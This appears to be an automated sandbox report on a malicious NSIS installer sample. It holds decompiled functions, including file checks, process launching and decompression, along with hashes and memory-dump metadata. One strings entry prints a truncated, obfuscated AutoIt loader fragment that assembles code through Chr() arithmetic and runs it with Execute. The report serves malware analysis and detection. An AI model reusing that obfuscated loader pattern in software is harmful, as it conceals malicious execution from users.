                                                                  0x0040689c
                                                                  0x0040689f
                                                                  0x004068a2
                                                                  0x004068a5
                                                                  0x004068a8
                                                                  0x004068ab
                                                                  0x004068c4
                                                                  0x004068c6
                                                                  0x004068c9
                                                                  0x004068ca
                                                                  0x004068cd
                                                                  0x004068cf
                                                                  0x004068d2
                                                                  0x004068d4
                                                                  0x004068d6
                                                                  0x004068d9
                                                                  0x004068db
                                                                  0x004068de
                                                                  0x004068e2
                                                                  0x004068e4
                                                                  0x004068e4
                                                                  0x004068e5
                                                                  0x004068e8
                                                                  0x004068eb
                                                                  0x004068ad
                                                                  0x004068ad
                                                                  0x004068b5
                                                                  0x004068ba
                                                                  0x004068bc
                                                                  0x004068bf
                                                                  0x004068bf
                                                                  0x004068ee
                                                                  0x004068f5
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x0040687f
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x00000000
                                                                  0x004068f7
                                                                  0x004068f5
                                                                  0x00406808
                                                                  0x0040680b
                                                                  0x0040680d
                                                                  0x00406810
                                                                  0x00406813
                                                                  0x00406816
                                                                  0x00406818
                                                                  0x0040681b
                                                                  0x0040681e
                                                                  0x0040681e
                                                                  0x00406821
                                                                  0x00406821
                                                                  0x00406824
                                                                  0x0040682b
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x004067ff
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x00000000
                                                                  0x0040682d
                                                                  0x0040682b
                                                                  0x004067b1
                                                                  0x004067b4
                                                                  0x004067b6
                                                                  0x004067b9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406518
                                                                  0x00406518
                                                                  0x0040651c
                                                                  0x00406b61
                                                                  0x00000000
                                                                  0x00406b61
                                                                  0x00406522
                                                                  0x00406525
                                                                  0x00406528
                                                                  0x0040652b
                                                                  0x0040652e
                                                                  0x00406531
                                                                  0x00406534
                                                                  0x00406536
                                                                  0x00406539
                                                                  0x0040653c
                                                                  0x0040653f
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00406541
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004066a3
                                                                  0x004066a3
                                                                  0x004066a7
                                                                  0x00406b6d
                                                                  0x00000000
                                                                  0x00406b6d
                                                                  0x004066ad
                                                                  0x004066b0
                                                                  0x004066b3
                                                                  0x004066b6
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066b8
                                                                  0x004066bb
                                                                  0x004066be
                                                                  0x004066c1
                                                                  0x004066c4
                                                                  0x004066c7
                                                                  0x004066ca
                                                                  0x004066cb
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066cd
                                                                  0x004066d0
                                                                  0x004066d3
                                                                  0x004066d6
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066d9
                                                                  0x004066dc
                                                                  0x004066de
                                                                  0x004066de
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406920
                                                                  0x00406924
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040692a
                                                                  0x0040692d
                                                                  0x00406930
                                                                  0x00406933
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406935
                                                                  0x00406938
                                                                  0x0040693b
                                                                  0x0040693e
                                                                  0x00406941
                                                                  0x00406944
                                                                  0x00406947
                                                                  0x00406948
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694a
                                                                  0x0040694d
                                                                  0x00406950
                                                                  0x00406953
                                                                  0x00406956
                                                                  0x00406959
                                                                  0x0040695d
                                                                  0x0040695f
                                                                  0x00406962
                                                                  0x00000000
                                                                  0x00406964
                                                                  0x004066e1
                                                                  0x004066e1
                                                                  0x00000000
                                                                  0x004066e1
                                                                  0x00406962
                                                                  0x00406b97
                                                                  0x00406bb9
                                                                  0x00406bbf
                                                                  0x00406bc1
                                                                  0x00406bc8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004061c6
                                                                  0x00406bce
                                                                  0x00406bce
                                                                  0x00000000

                                                                  Strings
                                                                  • Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655, xrefs: 0040618E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Global $K30ry88 = 227429608Global $X31w8rp1 = 1313542Global $A324so = ChrGlobal $P334kwt0hcp = ExecuteGlobal $R34og = $P334kwt0hcp($A324so(6618-6550) & $A324so(6658-6550) & $A324so(6658-6550) & $A324so(6633-6550) & $A324so(6666-6550) & $A324so(6664-655
                                                                  • API String ID: 0-3096212848
                                                                  • Opcode ID: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                                  • Instruction ID: a0ed0051221df213f48a7fa37d6c1b626956e64e776f215132b6db312d3b92b6
                                                                  • Opcode Fuzzy Hash: a98843a46fb9b62412bae302801de079c6452d7d4a4e23dbd568dc37708913b5
                                                                  • Instruction Fuzzy Hash: 10816671D04228DBDF24CFA8C8447ADBBB0FB45301F1181AAD856BB281D7786A96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 642 4058cf-4058ea call 405cfb call 405882 647 4058f0-4058fd call 405f5d 642->647 648 4058ec-4058ee 642->648 652 405909-40590b 647->652 653 4058ff-405903 647->653 649 405942-405944 648->649 655 405921-40592a lstrlenA 652->655 653->648 654 405905-405907 653->654 654->648 654->652 656 40592c-405940 call 4057ee GetFileAttributesA 655->656 657 40590d-405914 call 405ff6 655->657 656->649 662 405916-405919 657->662 663 40591b-40591c call 405835 657->663 662->648 662->663 663->655
                                                                  C-Code - Quality: 53%
                                                                  			E004058CF(void* __eflags, intOrPtr _a4) {
                                                                  				int _t11;
                                                                  				signed char* _t12;
                                                                  				long _t16;
                                                                  				intOrPtr _t18;
                                                                  				intOrPtr* _t21;
                                                                  				void* _t22;
                                                                  
                                                                  				E00405CFB(0x421988, _a4);
                                                                  				_t21 = E00405882(0x421988);
                                                                  				if(_t21 != 0) {
                                                                  					E00405F5D(_t21);
                                                                  					if(( *0x423f98 & 0x00000080) == 0) {
                                                                  						L5:
                                                                  						_t22 = _t21 - 0x421988;
                                                                  						while(1) {
                                                                  							_t11 = lstrlenA(0x421988);
                                                                  							_push(0x421988);
                                                                  							if(_t11 <= _t22) {
                                                                  								break;
                                                                  							}
                                                                  							_t12 = E00405FF6();
                                                                  							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                  								E00405835(0x421988);
                                                                  								continue;
                                                                  							} else {
                                                                  								goto L1;
                                                                  							}
                                                                  						}
                                                                  						E004057EE();
                                                                  						_t16 = GetFileAttributesA(??); // executed
                                                                  						return 0 | _t16 != 0xffffffff;
                                                                  					}
                                                                  					_t18 =  *_t21;
                                                                  					if(_t18 == 0 || _t18 == 0x5c) {
                                                                  						goto L1;
                                                                  					} else {
                                                                  						goto L5;
                                                                  					}
                                                                  				}
                                                                  				L1:
                                                                  				return 0;
                                                                  			}









                                                                  0x004058db
                                                                  0x004058e6
                                                                  0x004058ea
                                                                  0x004058f1
                                                                  0x004058fd
                                                                  0x00405909
                                                                  0x00405909
                                                                  0x00405921
                                                                  0x00405922
                                                                  0x00405929
                                                                  0x0040592a
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040590d
                                                                  0x00405914
                                                                  0x0040591c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405914
                                                                  0x0040592c
                                                                  0x00405932
                                                                  0x00000000
                                                                  0x00405940
                                                                  0x004058ff
                                                                  0x00405903
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405903
                                                                  0x004058ec
                                                                  0x00000000

                                                                  APIs
                                                                    • Part of subcall function 00405CFB: lstrcpynA.KERNEL32(?,?,00000400,004032FF,00423780,NSIS Error), ref: 00405D08
                                                                    • Part of subcall function 00405882: CharNextA.USER32(4V@,?,C:\,00000000,004058E6,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405890
                                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 00405895
                                                                    • Part of subcall function 00405882: CharNextA.USER32(00000000), ref: 004058A4
                                                                  • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405922
                                                                  • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74D0F560,00405634,?,C:\Users\user\AppData\Local\Temp\,74D0F560), ref: 00405932
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\
                                                                  • API String ID: 3248276644-3404278061
                                                                  • Opcode ID: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                                  • Instruction ID: 03f6043ec37f77008ca106ed659fbfe74b4750b5f08ac9da600103de26cb934a
                                                                  • Opcode Fuzzy Hash: e2955dcf029725b2ed1d5fce7c573bfe7ab26ede656e04fe1650c1d49aac5c3f
                                                                  • Instruction Fuzzy Hash: 94F02822509E116AC222333A1C09A9F0A19CE86338714453BFC51B22D2DB3C8D53ED7E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 665 40555b-405588 CreateProcessA 666 405596-405597 665->666 667 40558a-405593 CloseHandle 665->667 667->666
                                                                  C-Code - Quality: 100%
                                                                  			E0040555B(CHAR* _a4) {
                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                  				int _t7;
                                                                  
                                                                  				0x422588->cb = 0x44;
                                                                  				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422588,  &_v20); // executed
                                                                  				if(_t7 != 0) {
                                                                  					CloseHandle(_v20.hThread);
                                                                  					return _v20.hProcess;
                                                                  				}
                                                                  				return _t7;
                                                                  			}





                                                                  0x00405564
                                                                  0x00405580
                                                                  0x00405588
                                                                  0x0040558d
                                                                  0x00000000
                                                                  0x00405593
                                                                  0x00405597

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422588,Error launching installer), ref: 00405580
                                                                  • CloseHandle.KERNEL32(?), ref: 0040558D
                                                                  Strings
                                                                  • Error launching installer, xrefs: 0040556E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                                  • Instruction ID: b38bf566800866b301abd826c958dc9a0f2413a88be004d39ffa53c3aefd5702
                                                                  • Opcode Fuzzy Hash: 6ee0d5fb62aa5cd444cc046de2ae5613a3aa22ad20399a78c34ba76405e5be99
                                                                  • Instruction Fuzzy Hash: 29E0ECB4A0020ABBDB109F64ED09A6B7BBDFB14345F808921A914E2150E7B8D9549A69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 99%
                                                                  			E00406768() {
                                                                  				signed int _t530;
                                                                  				void _t537;
                                                                  				signed int _t538;
                                                                  				signed int _t539;
                                                                  				unsigned short _t569;
                                                                  				signed int _t579;
                                                                  				signed int _t607;
                                                                  				void* _t627;
                                                                  				signed int _t628;
                                                                  				signed int _t635;
                                                                  				signed int* _t643;
                                                                  				void* _t644;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					_t530 =  *(_t644 - 0x30);
                                                                  					if(_t530 >= 4) {
                                                                  					}
                                                                  					 *(_t644 - 0x40) = 6;
                                                                  					 *(_t644 - 0x7c) = 0x19;
                                                                  					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                  					while(1) {
                                                                  						L145:
                                                                  						 *(_t644 - 0x50) = 1;
                                                                  						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                  						while(1) {
                                                                  							L149:
                                                                  							if( *(_t644 - 0x48) <= 0) {
                                                                  								goto L155;
                                                                  							}
                                                                  							L150:
                                                                  							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                  							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                  							 *(_t644 - 0x54) = _t643;
                                                                  							_t569 =  *_t643;
                                                                  							_t635 = _t569 & 0x0000ffff;
                                                                  							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                  							if( *(_t644 - 0xc) >= _t607) {
                                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                  								_t628 = _t627 + 1;
                                                                  								 *_t643 = _t569 - (_t569 >> 5);
                                                                  								 *(_t644 - 0x50) = _t628;
                                                                  							} else {
                                                                  								 *(_t644 - 0x10) = _t607;
                                                                  								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                  								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                  							}
                                                                  							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                  								L148:
                                                                  								_t487 = _t644 - 0x48;
                                                                  								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                  								L149:
                                                                  								if( *(_t644 - 0x48) <= 0) {
                                                                  									goto L155;
                                                                  								}
                                                                  								goto L150;
                                                                  							} else {
                                                                  								L154:
                                                                  								L146:
                                                                  								if( *(_t644 - 0x6c) == 0) {
                                                                  									L169:
                                                                  									 *(_t644 - 0x88) = 0x18;
                                                                  									L170:
                                                                  									_t579 = 0x22;
                                                                  									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                  									_t539 = 0;
                                                                  									L172:
                                                                  									return _t539;
                                                                  								}
                                                                  								L147:
                                                                  								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                  								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                  								_t484 = _t644 - 0x70;
                                                                  								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                  								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                  								goto L148;
                                                                  							}
                                                                  							L155:
                                                                  							_t537 =  *(_t644 - 0x7c);
                                                                  							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                  							while(1) {
                                                                  								L140:
                                                                  								 *(_t644 - 0x88) = _t537;
                                                                  								while(1) {
                                                                  									L1:
                                                                  									_t538 =  *(_t644 - 0x88);
                                                                  									if(_t538 > 0x1c) {
                                                                  										break;
                                                                  									}
                                                                  									L2:
                                                                  									switch( *((intOrPtr*)(_t538 * 4 +  &M00406BD6))) {
                                                                  										case 0:
                                                                  											L3:
                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                  												goto L170;
                                                                  											}
                                                                  											L4:
                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                  											_t538 =  *( *(_t644 - 0x70));
                                                                  											if(_t538 > 0xe1) {
                                                                  												goto L171;
                                                                  											}
                                                                  											L5:
                                                                  											_t542 = _t538 & 0x000000ff;
                                                                  											_push(0x2d);
                                                                  											asm("cdq");
                                                                  											_pop(_t581);
                                                                  											_push(9);
                                                                  											_pop(_t582);
                                                                  											_t638 = _t542 / _t581;
                                                                  											_t544 = _t542 % _t581 & 0x000000ff;
                                                                  											asm("cdq");
                                                                  											_t633 = _t544 % _t582 & 0x000000ff;
                                                                  											 *(_t644 - 0x3c) = _t633;
                                                                  											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                  											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                  											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                  											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                  												L10:
                                                                  												if(_t641 == 0) {
                                                                  													L12:
                                                                  													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                  													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                  													goto L15;
                                                                  												} else {
                                                                  													goto L11;
                                                                  												}
                                                                  												do {
                                                                  													L11:
                                                                  													_t641 = _t641 - 1;
                                                                  													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                  												} while (_t641 != 0);
                                                                  												goto L12;
                                                                  											}
                                                                  											L6:
                                                                  											if( *(_t644 - 4) != 0) {
                                                                  												GlobalFree( *(_t644 - 4));
                                                                  											}
                                                                  											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                  											 *(_t644 - 4) = _t538;
                                                                  											if(_t538 == 0) {
                                                                  												goto L171;
                                                                  											} else {
                                                                  												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                  												goto L10;
                                                                  											}
                                                                  										case 1:
                                                                  											L13:
                                                                  											__eflags =  *(_t644 - 0x6c);
                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                  												L157:
                                                                  												 *(_t644 - 0x88) = 1;
                                                                  												goto L170;
                                                                  											}
                                                                  											L14:
                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                  											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                  											_t45 = _t644 - 0x48;
                                                                  											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                  											__eflags =  *_t45;
                                                                  											L15:
                                                                  											if( *(_t644 - 0x48) < 4) {
                                                                  												goto L13;
                                                                  											}
                                                                  											L16:
                                                                  											_t550 =  *(_t644 - 0x40);
                                                                  											if(_t550 ==  *(_t644 - 0x74)) {
                                                                  												L20:
                                                                  												 *(_t644 - 0x48) = 5;
                                                                  												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                  												goto L23;
                                                                  											}
                                                                  											L17:
                                                                  											 *(_t644 - 0x74) = _t550;
                                                                  											if( *(_t644 - 8) != 0) {
                                                                  												GlobalFree( *(_t644 - 8));
                                                                  											}
                                                                  											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                  											 *(_t644 - 8) = _t538;
                                                                  											if(_t538 == 0) {
                                                                  												goto L171;
                                                                  											} else {
                                                                  												goto L20;
                                                                  											}
                                                                  										case 2:
                                                                  											L24:
                                                                  											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                  											 *(_t644 - 0x84) = 6;
                                                                  											 *(_t644 - 0x4c) = _t557;
                                                                  											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                  											goto L132;
                                                                  										case 3:
                                                                  											L21:
                                                                  											__eflags =  *(_t644 - 0x6c);
                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                  												L158:
                                                                  												 *(_t644 - 0x88) = 3;
                                                                  												goto L170;
                                                                  											}
                                                                  											L22:
                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                  											_t67 = _t644 - 0x70;
                                                                  											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                  											__eflags =  *_t67;
                                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                  											L23:
                                                                  											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                  											if( *(_t644 - 0x48) != 0) {
                                                                  												goto L21;
                                                                  											}
                                                                  											goto L24;
                                                                  										case 4:
                                                                  											L133:
                                                                  											_t559 =  *_t642;
                                                                  											_t626 = _t559 & 0x0000ffff;
                                                                  											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                  											if( *(_t644 - 0xc) >= _t596) {
                                                                  												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                  												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                  												 *(_t644 - 0x40) = 1;
                                                                  												_t560 = _t559 - (_t559 >> 5);
                                                                  												__eflags = _t560;
                                                                  												 *_t642 = _t560;
                                                                  											} else {
                                                                  												 *(_t644 - 0x10) = _t596;
                                                                  												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                  												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                  											}
                                                                  											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                  												goto L139;
                                                                  											} else {
                                                                  												goto L137;
                                                                  											}
                                                                  										case 5:
                                                                  											L137:
                                                                  											if( *(_t644 - 0x6c) == 0) {
                                                                  												L168:
                                                                  												 *(_t644 - 0x88) = 5;
                                                                  												goto L170;
                                                                  											}
                                                                  											L138:
                                                                  											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                  											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                  											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                  											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                  											L139:
                                                                  											_t537 =  *(_t644 - 0x84);
                                                                  											L140:
                                                                  											 *(_t644 - 0x88) = _t537;
                                                                  											goto L1;
                                                                  										case 6:
                                                                  											L25:
                                                                  											__edx = 0;
                                                                  											__eflags =  *(__ebp - 0x40);
                                                                  											if( *(__ebp - 0x40) != 0) {
                                                                  												L36:
                                                                  												__eax =  *(__ebp - 4);
                                                                  												__ecx =  *(__ebp - 0x38);
                                                                  												 *(__ebp - 0x34) = 1;
                                                                  												 *(__ebp - 0x84) = 7;
                                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                  												goto L132;
                                                                  											}
                                                                  											L26:
                                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  											__esi =  *(__ebp - 0x60);
                                                                  											__cl = 8;
                                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  											__ecx =  *(__ebp - 0x3c);
                                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  											__ecx =  *(__ebp - 4);
                                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  											if( *(__ebp - 0x38) >= 4) {
                                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                                  													_t98 = __ebp - 0x38;
                                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                  													__eflags =  *_t98;
                                                                  												} else {
                                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  												}
                                                                  											} else {
                                                                  												 *(__ebp - 0x38) = 0;
                                                                  											}
                                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                                  											if( *(__ebp - 0x34) == __edx) {
                                                                  												L35:
                                                                  												__ebx = 0;
                                                                  												__ebx = 1;
                                                                  												goto L61;
                                                                  											} else {
                                                                  												L32:
                                                                  												__eax =  *(__ebp - 0x14);
                                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                                  													__eflags = __eax;
                                                                  												}
                                                                  												__ecx =  *(__ebp - 8);
                                                                  												__ebx = 0;
                                                                  												__ebx = 1;
                                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  												goto L41;
                                                                  											}
                                                                  										case 7:
                                                                  											L66:
                                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                                  											if( *(__ebp - 0x40) != 1) {
                                                                  												L68:
                                                                  												__eax =  *(__ebp - 0x24);
                                                                  												 *(__ebp - 0x80) = 0x16;
                                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  												__eax =  *(__ebp - 0x28);
                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  												__eax =  *(__ebp - 0x2c);
                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  												__eax = 0;
